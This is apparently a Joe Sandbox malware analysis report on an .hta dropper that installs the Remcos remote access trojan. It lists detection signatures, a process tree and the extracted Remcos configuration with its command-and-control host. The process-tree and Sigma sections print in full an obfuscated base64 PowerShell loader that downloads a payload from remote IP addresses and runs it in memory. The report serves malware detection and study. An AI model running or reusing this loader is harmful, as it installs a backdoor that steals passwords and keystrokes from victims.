Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta

Overview

General Information

Sample name:earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta
Analysis ID:1639290
MD5:54b1c0ca731cb53dc1778a393aa0ab38
SHA1:c991cf04f9ded6b6823fdf5e730890850ea7b777
SHA256:1062633c85423f873214e50175d44e3aa1a29f24e2abed589170ae69cf6f1138
Tags:htauser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected VBS Downloader Generic
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Legitimate Application Dropped Script
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6972 cmdline: mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6596 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 6672 cmdline: wscript //nologo "C:\Windows\Temp\nonordinary.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 3824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • CasPol.exe (PID: 8328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
            • recover.exe (PID: 8416 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk" MD5: D38B657A068016768CA9F3B5E100B472)
            • recover.exe (PID: 8424 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk" MD5: D38B657A068016768CA9F3B5E100B472)
            • recover.exe (PID: 8432 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx" MD5: D38B657A068016768CA9F3B5E100B472)
            • recover.exe (PID: 8452 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy" MD5: D38B657A068016768CA9F3B5E100B472)
      • timeout.exe (PID: 6680 cmdline: timeout /t 1 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["qwertyuioplkjhgfdsazxcvbnm.ydns.eu:14645:1"], "Assigned name": "zyno666", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4E8SNN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\nonordinary.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6d758:$a1: Remcos restarted by watchdog!
          • 0x6dda8:$a3: %02i:%02i:%02i:%03i
          0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x679f4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x67a64:$str_b2: Executing file:
          • 0x6889c:$str_b3: GetDirectListeningPort
          • 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x68448:$str_b7: \update.vbs
          • 0x67a8c:$str_b9: Downloaded file:
          • 0x67a78:$str_b10: Downloading file:
          • 0x67b1c:$str_b12: Failed to upload file:
          • 0x68864:$str_b13: StartForward
          • 0x68884:$str_b14: StopForward
          • 0x683a0:$str_b15: fso.DeleteFile "
          • 0x68334:$str_b16: On Error Resume Next
          • 0x683d0:$str_b17: fso.DeleteFolder "
          • 0x67b0c:$str_b18: Uploaded file:
          • 0x67acc:$str_b19: Unable to delete:
          • 0x68368:$str_b20: while fso.FileExists("
          • 0x67fa9:$str_c0: [Firefox StoredLogins not found]
          Click to see the 24 entries
          SourceRuleDescriptionAuthorStrings
          12.2.CasPol.exe.37e0000.1.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            14.2.recover.exe.400000.0.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              10.2.powershell.exe.5acb250.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                10.2.powershell.exe.5acb250.7.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  10.2.powershell.exe.5acb250.7.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 23 entries
                    SourceRuleDescriptionAuthorStrings
                    amsi32_3824.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi32_3824.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#b
                        Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6972, TargetFilename: C:\Windows\Temp\unmovably.bat
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#b
                        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6672, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49720
